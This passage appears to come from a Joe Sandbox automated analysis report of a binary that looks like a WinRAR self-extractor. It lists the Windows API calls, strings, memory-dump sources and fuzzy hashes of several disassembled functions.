                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: U$p$z
                                                                                                                        • API String ID: 176396367-3999876168
                                                                                                                        • Opcode ID: 9cdee465b87615dfd32897690991bad3afa849e04a85b2412053f8c8a31458a2
                                                                                                                        • Instruction ID: b3260429683b85f2f4823983e77b6013f7ad572f227e08f1b5f39b5c670dd276
                                                                                                                        • Opcode Fuzzy Hash: 9cdee465b87615dfd32897690991bad3afa849e04a85b2412053f8c8a31458a2
                                                                                                                        • Instruction Fuzzy Hash: C041B471A0066A9FCB11AF788C069EF7BB8EF45310F00406AF945F7255DE30AE498AA5
                                                                                                                        Function 00EA9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00EA9EEE
                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00EA9F44
                                                                                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00EA9FDB
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00EA9FE3
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00EA9FF9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$RectText
                                                                                                                        • String ID: $RarHtmlClassName
                                                                                                                        • API String ID: 3937224194-266247588
                                                                                                                        • Opcode ID: f3b755102b66b3da21e36cfa4578dedcd04f40a485b566ce7deccd51423f9dfa
                                                                                                                        • Instruction ID: 79dcb7f9131ee56d33479d57b3733b0f712cbf8fd817cc4cfb1efa01d33e7c75
                                                                                                                        • Opcode Fuzzy Hash: f3b755102b66b3da21e36cfa4578dedcd04f40a485b566ce7deccd51423f9dfa
                                                                                                                        • Instruction Fuzzy Hash: B141C031105310AFCB215F75DC88B7BBBA8FF89715F045569F849BA056CB34E908CB61
                                                                                                                        Function 00EA1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __aulldiv.LIBCMT ref: 00EA122E
                                                                                                                          • Part of subcall function 00E9B146: GetVersionExW.KERNEL32(?), ref: 00E9B16B
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00EA1251
                                                                                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00EA1263
                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00EA1274
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1284
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1294
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00EA12CF
                                                                                                                        • __aullrem.LIBCMT ref: 00EA1379
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1247370737-0
                                                                                                                        • Opcode ID: 21ee2f27dc5998425194d51ced7d41c8664791d8fa227a63371eda0a051a720b
                                                                                                                        • Instruction ID: 7f80df30c740564ef37f67587bb9e347f950d67a90c435f54941b8c55f1303f6
                                                                                                                        • Opcode Fuzzy Hash: 21ee2f27dc5998425194d51ced7d41c8664791d8fa227a63371eda0a051a720b
                                                                                                                        • Instruction Fuzzy Hash: 924128B2508305AFC710DF65C88496BBBF9FF88314F04892EF596D6210E739E649CB62
                                                                                                                        Function 00E92210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00E92536
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                                                        • API String ID: 3053425827-2277559157
                                                                                                                        • Opcode ID: 906e4bacc4a80cfc7d20db32dfcf0e18b3d34af2023a36ff635a30f7ec4ba814
                                                                                                                        • Instruction ID: 93750f90e0afc8430fbe238b6883670f1edfe4b78afcdb430a0d0d0b380fd161
                                                                                                                        • Opcode Fuzzy Hash: 906e4bacc4a80cfc7d20db32dfcf0e18b3d34af2023a36ff635a30f7ec4ba814
                                                                                                                        • Instruction Fuzzy Hash: 59F14870604340ABDF25EF248495BFE7BD95F94304F08296DEE8ABB283CB649945C762
                                                                                                                        Function 00EA9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                        • API String ID: 176396367-3568243669
                                                                                                                        • Opcode ID: 37caa3343ceb13575fc36caed3b7b0786ca2af2ba058d6c88660987c66879be3
                                                                                                                        • Instruction ID: 85834a1bec9fe1539e3f186711270b624bf82265b9ad7835f04e860151ca553b
                                                                                                                        • Opcode Fuzzy Hash: 37caa3343ceb13575fc36caed3b7b0786ca2af2ba058d6c88660987c66879be3
                                                                                                                        • Instruction Fuzzy Hash: 8C516B6670132395DB309A24981177673E0DFAF758F58642AF9C1BF1C3FB65ACC18261
                                                                                                                        Function 00EBF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00EBFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00EBF6CF
                                                                                                                        • __fassign.LIBCMT ref: 00EBF74A
                                                                                                                        • __fassign.LIBCMT ref: 00EBF765
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00EBF78B
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,00EBFE02,00000000,?,?,?,?,?,?,?,?,?,00EBFE02,00000000), ref: 00EBF7AA
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,00EBFE02,00000000,?,?,?,?,?,?,?,?,?,00EBFE02,00000000), ref: 00EBF7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: d94d33540870b37f6949381841cad2db5274f2182baa97efa811fbec93ee4bff
                                                                                                                        • Instruction ID: 84b37557d700b6a3f2c6783d36bb3257da494aa7edda632900304ddb381ce18d
                                                                                                                        • Opcode Fuzzy Hash: d94d33540870b37f6949381841cad2db5274f2182baa97efa811fbec93ee4bff
                                                                                                                        • Instruction Fuzzy Hash: 2B51B5B1D002499FDB14CFA8DC85AEEBBF5EF09300F14516AE955F7251E730AA45CBA0
                                                                                                                        Function 00EACE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 00EACE9D
                                                                                                                          • Part of subcall function 00E9B690: _wcslen.LIBCMT ref: 00E9B696
                                                                                                                        • _swprintf.LIBCMT ref: 00EACED1
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,00ED946A), ref: 00EACEF1
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00EACF22
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EACFFE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                        • String ID: %s%s%u
                                                                                                                        • API String ID: 689974011-1360425832
                                                                                                                        • Opcode ID: a578e763b71fcfef794d2b037f78b01346a370c94ef9dd4c6641198ae6584aef
                                                                                                                        • Instruction ID: 0883238dddf6679cd3d7620108de092d8369dd44003b857c26f3885f3ea0022f
                                                                                                                        • Opcode Fuzzy Hash: a578e763b71fcfef794d2b037f78b01346a370c94ef9dd4c6641198ae6584aef
                                                                                                                        • Instruction Fuzzy Hash: 31418471900258AEDF219B50DC45EEA77FCEB09304F4094A7F90AFB141EE70AA49CF61
                                                                                                                        Function 00EB2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EB2937
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00EB293F
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EB29C8
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00EB29F3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EB2A48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: f4e40df8f58a4ffe0b18eaba274724494aec74f98e83cbb808a82037105cdc08
                                                                                                                        • Instruction ID: eacd508d81bf505f36b083f83cfa0e9136a94e6183c6143ba3efcb4fd21336f1
                                                                                                                        • Opcode Fuzzy Hash: f4e40df8f58a4ffe0b18eaba274724494aec74f98e83cbb808a82037105cdc08
                                                                                                                        • Instruction Fuzzy Hash: 8B41D434A00208AFCF14DF68C881ADF7BF1EF45328F149169E919BB392D7319A55CB90
                                                                                                                        Function 00EA9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                        • API String ID: 176396367-3743748572
                                                                                                                        • Opcode ID: db80828532f30db4067dfc7e1c4c166f4ce6171eebe3af4d1a974f7d3b5d25f3
                                                                                                                        • Instruction ID: f74586cdfdcffb54f0d659ecfff617df0590b22ee4431377a82cd6411ef7033f
                                                                                                                        • Opcode Fuzzy Hash: db80828532f30db4067dfc7e1c4c166f4ce6171eebe3af4d1a974f7d3b5d25f3
                                                                                                                        • Instruction Fuzzy Hash: 5C319D3664430166DA30AB949C42BBB73E4EB86324F50942FF4867F2C2FB64BD4183A1
                                                                                                                        Function 00EAAAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00EAAAD2
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00EAAB01
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00EAAB99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectRelease
                                                                                                                        • String ID: -$7$
                                                                                                                        • API String ID: 1429681911-575736043
                                                                                                                        • Opcode ID: 93468c4847ee69656c31d4840ba446ab81da1f2b3a42d89b6f3ff00beadc57d2
                                                                                                                        • Instruction ID: a559ba8ba516c0a7a1af9ffec083d5c8948dd74239b2d841d521d078bf81cb36
                                                                                                                        • Opcode Fuzzy Hash: 93468c4847ee69656c31d4840ba446ab81da1f2b3a42d89b6f3ff00beadc57d2
                                                                                                                        • Instruction Fuzzy Hash: EE21EB72108304BFD3019FA6DC48E7FBFE9FB89351F04091AFA45A2120DB319A58DB62
                                                                                                                        Function 00EBC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBC868: _free.LIBCMT ref: 00EBC891
                                                                                                                        • _free.LIBCMT ref: 00EBC8F2
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EBC8FD
                                                                                                                        • _free.LIBCMT ref: 00EBC908
                                                                                                                        • _free.LIBCMT ref: 00EBC95C
                                                                                                                        • _free.LIBCMT ref: 00EBC967
                                                                                                                        • _free.LIBCMT ref: 00EBC972
                                                                                                                        • _free.LIBCMT ref: 00EBC97D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                        • Instruction ID: 536c8a3643a3a8bfc54c90905bffbe9ce1db00ab2087016face0eb1e857bb9c6
                                                                                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                        • Instruction Fuzzy Hash: 37112E71584B04AAE625BBB1EC07FCB7BECAF04B00F905C25F29DB6192DA75B505CB60
                                                                                                                        Function 00EAE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00EAE669,00EAE5CC,00EAE86D), ref: 00EAE605
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00EAE61B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00EAE630
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        • Opcode ID: 07cbd39b10b796a8960e6e38ca5e3ded95d62337d1e7f1211e702a53af1509c4
                                                                                                                        • Instruction ID: 94c4bff0b623233ce9b0f231e751fb30a3953db6ee500b57863a1b597eb9f882
                                                                                                                        • Opcode Fuzzy Hash: 07cbd39b10b796a8960e6e38ca5e3ded95d62337d1e7f1211e702a53af1509c4
                                                                                                                        • Instruction Fuzzy Hash: 5DF0C8327807229F0B214E765D85AB672C96BAF7493006C7DD901FB300EB11EC5A9790
                                                                                                                        Function 00EB8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EB891E
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EB8930
                                                                                                                        • _free.LIBCMT ref: 00EB8943
                                                                                                                        • _free.LIBCMT ref: 00EB8954
                                                                                                                        • _free.LIBCMT ref: 00EB8965
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID: p
                                                                                                                        • API String ID: 776569668-2678736219
